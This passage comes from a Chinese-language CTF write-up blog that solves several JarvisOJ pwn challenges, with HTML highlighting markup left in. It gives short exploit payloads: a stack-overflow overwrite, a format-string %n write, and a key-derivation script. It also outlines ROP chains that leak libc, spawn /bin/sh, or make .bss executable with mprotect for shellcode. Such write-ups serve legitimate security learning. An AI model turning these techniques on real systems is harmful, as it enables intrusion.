class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">28:0140│</span> <span class="err">0</span><span class="nf">x7fffffffdf10</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">29:0148│</span> <span class="err">0</span><span class="nf">x7fffffffdf18</span> <span class="err">—▸</span> <span class="mi">0x7fffffffdfe8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe312</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="err">2</span><span class="nl">a:</span><span class="err">0150│</span> <span class="err">0</span><span class="nf">x7fffffffdf20</span> <span class="err">◂—</span> <span class="mi">0x100000000</span> <span class="err">2</span><span class="nl">b:</span><span class="err">0158│</span> <span class="err">0</span><span class="nf">x7fffffffdf28</span> <span class="err">—▸</span> <span class="mi">0x4006d0</span> <span class="err">◂—</span> <span class="no">sub</span> <span class="no">rsp</span><span class="p">,</span> <span class="mi">8</span> <span class="err">2</span><span class="nl">c:</span><span class="err">0160│</span> <span class="err">0</span><span class="nf">x7fffffffdf30</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">2</span><span class="nl">d:</span><span class="err">0168│</span> <span class="err">0</span><span class="nf">x7fffffffdf38</span> <span class="err">◂—</span> <span class="mi">0xeab3e86e873f94c</span> <span class="err">2</span><span class="nl">e:</span><span class="err">0170│</span> <span class="err">0</span><span class="nf">x7fffffffdf40</span> <span class="err">—▸</span> <span class="mi">0x4006ee</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">2</span><span class="nl">f:</span><span class="err">0178│</span> <span class="err">0</span><span class="nf">x7fffffffdf48</span> <span class="err">—▸</span> <span class="mi">0x7fffffffdfe0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">30:0180│</span> <span class="err">0</span><span class="nf">x7fffffffdf50</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="na">...</span> <span class="err">↓</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">distance</span> <span class="mi">0x7fffffffdfe8</span> <span class="mi">0x7fffffffddd0</span> <span class="err">0</span><span class="nf">x7fffffffdfe8-</span><span class="err">&gt;</span><span class="mi">0x7fffffffddd0</span> <span class="no">is</span> <span class="p">-</span><span class="mi">0x218</span> <span class="no">bytes</span> <span class="p">(-</span><span class="mi">0x43</span> <span class="no">words</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">search</span> <span class="no">CTF</span><span class="err">{</span> <span class="nf">smashes</span> <span class="mi">0x400d21</span> <span class="no">push</span> <span class="no">r12</span> <span class="nf">smashes</span> <span class="mi">0x600d21</span> <span class="mi">0x657265487b465443</span> <span class="p">(</span><span class="err">&#39;</span><span class="no">CTF</span><span class="err">{</span><span class="no">Here</span><span class="err">&#39;</span><span class="p">)</span> <span class="nl">warning:</span> <span class="nf">Unable</span> <span class="no">to</span> <span class="no">access</span> <span class="mi">16000</span> <span class="no">bytes</span> <span class="no">of</span> <span class="no">target</span> <span class="no">memory</span> <span class="no">at</span> <span class="mi">0x7ffff7bd2e83</span><span class="p">,</span> <span class="no">halting</span> <span class="no">search.</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> </code></pre></td></tr></table> </div> </div><p>因此可以构造如下的 payload</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x218</span><span class="p">),</span> <span class="mh">0x400d21</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>或者可以用一种更暴力的方法，不计算偏移量，直接用 flag 地址暴力覆盖过去</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x400d21</span><span class="p">)</span> <span class="o">*</span> <span class="mi">100</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_Smashes/solve.py">exploit here</a></p> <h2 id="61dctffm-200">[61dctf]fm (200)</h2> <p>格式化字符串漏洞的入门题目，格式化字符串漏洞的原理也可以找到很多分析，这里不说了。这道题目中只需要修改一个全局变量的值为 4 即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">payload</span> <span class="o">=</span> <span class="n">p32</span><span class="p">(</span><span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./fm&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;x&#39;</span><span class="p">])</span> <span class="o">+</span> <span class="s2">&#34;%11$n&#34;</span> <span class="c1"># 或者使用 fmtstr_payload()</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">fmtstr_payload</span><span class="p">(</span><span class="mi">11</span><span class="p">,</span> <span class="p">{</span><span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./fm&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;x&#39;</span><span class="p">]:</span> <span class="mi">4</span><span class="p">})</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_fm/solve.py">exploit here</a></p> <h2 id="backdoor-200">Backdoor (200)</h2> <p>一个 windows 的题目，其实更像一个逆向题目。</p> <p>在 <code>sub_401000</code> 函数中存在栈溢出</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">sub_401000</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">Source</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">Dest</span><span class="p">[</span><span class="mi">31</span><span class="p">];</span> <span class="c1">// [esp+4Ch] [ebp-20h] </span><span class="c1"></span> <span class="n">strcpy</span><span class="p">(</span><span class="n">Dest</span><span class="p">,</span> <span class="s">&#34;0&#34;</span><span class="p">);</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">18</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">22</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">26</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">30</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">Dest</span><span class="p">,</span> <span class="n">Source</span><span class="p">);</span> <span class="c1">// overflow </span><span class="c1"></span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>Source 是由 argv[1] 以及程序中的 xor，qmemcpy 等操作共同决定的。看一下进行了哪些操作</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">signed</span> <span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">wmain</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">v3</span><span class="p">[</span><span class="mi">145</span><span class="p">];</span> <span class="c1">// [esp+50h] [ebp-2C8h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [esp+E1h] [ebp-237h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">v5</span><span class="p">[</span><span class="mi">28</span><span class="p">];</span> <span class="c1">// [esp+E4h] [ebp-234h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">Source</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span> <span class="c1">// [esp+100h] [ebp-218h] </span><span class="c1"></span> <span class="kr">__int16</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [esp+108h] [ebp-210h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">Dest</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span> <span class="c1">// [esp+10Ch] [ebp-20Ch] </span><span class="c1"></span> <span class="kr">__int16</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// [esp+30Ch] [ebp-Ch] </span><span class="c1"></span> <span class="n">LPSTR</span> <span class="n">lpMultiByteStr</span><span class="p">;</span> <span class="c1">// [esp+310h] [ebp-8h] </span><span class="c1"></span> <span class="kt">int</span> <span class="n">cbMultiByte</span><span class="p">;</span> <span class="c1">// [esp+314h] [ebp-4h] </span><span class="c1"></span> <span class="n">cbMultiByte</span> <span class="o">=</span> <span class="n">WideCharToMultiByte</span><span class="p">(</span><span class="mi">1u</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="n">LPCWSTR</span><span class="p">)</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">lpMultiByteStr</span> <span class="o">=</span> <span class="p">(</span><span class="n">LPSTR</span><span class="p">)</span><span class="n">sub_4011F0</span><span class="p">(</span><span class="n">cbMultiByte</span><span class="p">);</span> <span class="n">WideCharToMultiByte</span><span class="p">(</span><span class="mi">1u</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="n">LPCWSTR</span><span class="p">)</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">lpMultiByteStr</span><span class="p">,</span> <span class="n">cbMultiByte</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">offset</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">lpMultiByteStr</span><span class="p">;</span> <span class="c1">// offset = argv[1] </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span> <span class="n">offset</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">offset</span> <span class="o">^=</span> <span class="mh">0x6443u</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">Dest</span><span class="p">,</span> <span class="s">&#34;0&#34;</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x1FEu</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">offset</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="n">Dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;A&#39;</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">Source</span> <span class="o">=</span> <span class="mh">0x7FFA4512</span><span class="p">;</span> <span class="c1">// jmp esp </span><span class="c1"></span> <span class="n">Source</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="n">Source</span><span class="p">);</span> <span class="n">qmemcpy</span><span class="p">(</span><span class="n">v5</span><span class="p">,</span> <span class="n">nops</span><span class="p">,</span> <span class="mh">0x1Au</span><span class="p">);</span> <span class="n">strcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="n">offset</span> <span class="o">+</span> <span class="mi">4</span><span class="p">],</span> <span class="n">v5</span><span class="p">);</span> <span class="n">qmemcpy</span><span class="p">(</span><span class="n">v3</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">shellcode</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">v3</span><span class="p">));</span> <span class="n">v4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">strcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Dest</span><span class="p">[</span><span class="n">offset</span> <span class="o">+</span> <span class="mi">29</span><span class="p">],</span> <span class="n">v3</span><span class="p">);</span> <span class="n">sub_401000</span><span class="p">(</span><span class="n">Dest</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>大致的处理流程是用户传给程序的参数 (argv[1]) 亦或 0x6443 后作为一个偏移量，然后 <code>jmp esp，nops，shellcode</code> 等依次 copy 到 Dest[offset] 上，最后在 <strong>sub_401000()</strong> 里触出栈溢出(本来不知道 0x7FFA4512 是什么，搜了一下才发现这是 windows 下的一个 <a href="https://blog.csdn.net/gxustudent/article/details/6624530">万能 jmp esp</a>)</p> <p>看一下 <strong>sub_401000()</strong> 的栈结构，控制 <code>jmp esp</code> 为返回地址即可触发后门，也即是 <strong>offset ^ 0x6443 == 0x20 + 4</strong> 即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="err">-00000020</span> <span class="nf">Dest</span> <span class="no">db</span> <span class="mi">31</span> <span class="no">dup</span><span class="p">(</span><span class="err">?</span><span class="p">)</span> <span class="err">-00000001</span> <span class="nf">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="err">+</span><span class="mi">00000000</span> <span class="no">s</span> <span class="no">db</span> <span class="mi">4</span> <span class="no">dup</span><span class="p">(</span><span class="err">?</span><span class="p">)</span> <span class="err">+00000004</span> <span class="nf">r</span> <span class="no">db</span> <span class="mi">4</span> <span class="no">dup</span><span class="p">(</span><span class="err">?</span><span class="p">)</span> <span class="err">+00000008</span> <span class="nf">Source</span> <span class="no">dd</span> <span class="err">?</span> </code></pre></td></tr></table> </div> </div><p>因此可以得到该参数和 flag</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">jarvisOJ_Backdoor</span> <span class="p">[</span><span class="n">master</span><span class="err">●●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span> <span class="kn">from</span> <span class="nn">libnum</span> <span class="kn">import</span> <span class="n">n2s</span> <span class="n">key</span> <span class="o">=</span> <span class="mh">0x20</span> <span class="o">+</span> <span class="mi">4</span> <span class="n">key</span> <span class="o">^=</span> <span class="mh">0x6443</span> <span class="k">print</span> <span class="n">key</span> <span class="n">key</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">key</span><span class="p">)[</span><span class="mi">2</span><span class="p">:</span> <span class="p">]</span> <span class="k">print</span> <span class="s2">&#34;PCTF{</span><span class="si">%s</span><span class="s2">}&#34;</span> <span class="o">%</span> <span class="p">(</span><span class="n">sha256</span><span class="p">(</span><span class="n">key</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">&#39;hex&#39;</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">())</span> </code></pre></td></tr></table> </div> </div><h2 id="xmanlevel3x64-250">[XMAN]level3(x64) (250)</h2> <p>与 level3 相比，只在函数传参上有区别，按照 x64 的函数调用约定 leak 出 libc，然后 rop 执行 system(&quot;/bin/sh&rdquo;) 即可。</p> <p>值得注意的是，这道题目中没有 puts，因此 leak libc 只能通过 <code>write(1, elf.got['write'], 8)</code>，但 ROPgadget 等工具只能找到控制 rdi 和 rsi 的 gadget，也就是我们不能控制 write 输出的长度，这时候有两种方法：</p> <p>一是使用 64 位 elf 的 <a href="https://www.cnblogs.com/Ox9A82/p/5487725.html">通用 gadget</a>；</p> <p>二是通过调试发现 write 时 rdx 是大于 8 的（实际上大于 6 即可），因此可以完全不用考虑控制 rdx。</p> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/jarvisOJ_level3_x64">exploit here</a></p> <h2 id="xmanlevel4-250">[XMAN]level4 (250)</h2> <p>这道题目与 level3 相比没有提供 libc，因此就不能通过 leak libc 的方式来找 system 和 /bin/sh 的地址了。pwntools 中有个很有用的函数 <a href="http://docs.pwntools.com/en/stable/dynelf.html?highlight=DynELF#module-pwnlib.dynelf">DynELF</a>，可以在能控制 leak 内容的情况下leak 出某些函数的地址（如 system）。</p> <p>和 level3 相似，这道题目可以构造 rop leak 出某些地址上的内容后返回到 _start，因此可以通过 DynELF 来 leak 出 system 的地址，再读入 /bin/sh\0 字符串既可以构造 rop 调用 <code>system(&quot;/bin/sh&quot;)</code></p> <blockquote> <p>DynELF 的原理可以看沐师傅的一篇 <a href="http://muhe.live/2016/12/24/what-DynELF-does-basically/">分析</a></p> </blockquote> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level4/solve.py">exploit here</a></p> <h2 id="test-your-memory-300">Test Your Memory (300)</h2> <p>这道题目分数给高了，难度大概只是和 level2 相当，构造 rop chain 直接调用 <code>system(&quot;cat flag&quot;)</code> 即可，唯一需要注意的是程序最后有一个 strncmp，需要保证此时 strncmp 比较的两个两个地址都是可读的</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strncmp</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">s2</span><span class="p">,</span> <span class="mi">4u</span><span class="p">)</span> <span class="p">)</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;good job!!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="k">else</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;cff flag is failed!!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+-----------+ |padding | |...... | | | +-----------+ |padding | &lt;- ebp +-----------+ |win_func | &lt;- ret addr +-----------+- |readable | &lt;- mem_test 函数的参数，即 strncmp 比较的对象，需要保证该地址是可读的 +-----------+ |catflag | +-----------+ </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_Test_Your_Memory/solve.py">exploit here</a></p> <h2 id="xmanlevel5-300">[XMAN]level5 (300)</h2> <p>题目假设禁用了 system 和 execve，并提示使用 <code>mprotect</code> 或者 <code>mmap</code>。先看一下这两个函数是什么作用，查看这两个函数的 man 手册</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">NAME mprotect — set protection of memory mapping SYNOPSIS #include &lt;sys/mman.h&gt; int mprotect(void *addr, size_t len, int prot); DESCRIPTION The mprotect() function shall change the access protections to be that speci‐ fied by prot for those whole pages containing any part of the address space of the process starting at address addr and continuing for len bytes. The parame‐ ter prot determines whether read, write, execute, or some combination of accesses are permitted to the data being mapped. The prot argument should be either PROT_NONE or the bitwise-inclusive OR of one or more of PROT_READ, PROT_WRITE, and PROT_EXEC. NAME mmap — map pages of memory SYNOPSIS #include &lt;sys/mman.h&gt; void *mmap(void *addr, size_t len, int prot, int flags, int fildes, off_t off); DESCRIPTION The mmap() function shall establish a mapping between an address space of a process and a memory object. </code></pre></td></tr></table> </div> </div><h3 id="mprotect">mprotect</h3> <p>mprotect 函数用于改变某段地址的权限（rwxp），mmap 用于申请一段空间，根据参数不同可以设置这段空间的权限。</p> <p>这道题目开启了 NX 保护，并假设禁用了 system 和 execve 函数（实际并没有），因此可以考虑通过 mprotect 改变 .bss/.data 权限或者通过 mmap 申请一段具有可执行权限的空间写 shellcode 的方法来 get shell，重点介绍如何使用 mprotect。</p> <ol> <li>第一次 rop 使用 <strong>write(1, elf.got[&lsquo;write&rsquo;], rdx)</strong> leak 出 libc 基地址</li> <li>第二次 rop 使用 <strong>mprotect(0x00600000, 0x1000, 7)</strong> 把 .bss 段设为有可执行权限</li> <li>第三次 rop 通过 <strong>read(0, elf.bss() + 0x500, 0x100)</strong> 把 shellcode 读到 .bss 并返回到 shellcode</li> </ol> <p>需要注意的是第一次 rop 时，与 level3 相似，调试可以发现 rdx 是大于 6的，因此可以不用通用 gadget 来设置 rdx；</p> <p>但第二次使用 mprotect 时必须设置 rdx 寄存器，这时候我们已经 leak 除了 libc 基地址，因此可以<strong>使用 libc 中的 gadget 来设置 rdx</strong>，也不需要用通用 gadget。</p> <p>并且 <strong>mprotect 指定的内存区必须包含整个内存页，区间长度必须是页大小的整数倍</strong>。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level5/exp_mprotect.py">exploit here</a></p> <h3 id="mmap">mmap</h3> <p>mmap 可以申请一段空间，但麻烦在需要控制 6 个参数，对 64 位的程序而言，也就是需要找到能控制 <code>rdi, rsi, rdx, rcx, r8, r9</code> 的 gadget。</p> <p>刚开始尝试了 <a href="http://www.anquan.us/static/drops/binary-10638.html">_dl_runtime_resolve</a> 中的 gadget，但实际调试的过程中发现因为版本不一致，这个 gadget 已经不能用了。后来找了很久这样的 gadget 但没找到，就放弃了。再后来偶然发现 angelboy 的 <a href="https://github.com/scwuaptx/Pwngdb">Pwngdb</a> 的 magic 命令中有一个 <code>setcontext+0x35</code>，看一下具体是什么。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">pwndbg&gt; magic ========== function ========== system:0x42510 execve:0xc4860 open:0xe7c20 read:0xe8050 write:0xe8120 gets:0x6ec20 setcontext+0x35:0x44f05 &lt;== target ========== variables ========== __malloc_hook(0x3b4c30) : 0x00007ffff789c830 __free_hook(0x3b68e8) : 0x0000000000000000 __realloc_hook(0x3b4c28) : 0x00007ffff789d0b0 stdin(0x3b5850) : 0x00007ffff7bcea00 stdout(0x3b5848) : 0x00007ffff7bcf760 _IO_list_all(0x3b5660) : 0x00007ffff7bcf680 __after_morecore_hook(0x3b68e0) : 0x0000000000000000 pwndbg&gt; libcbase libc : 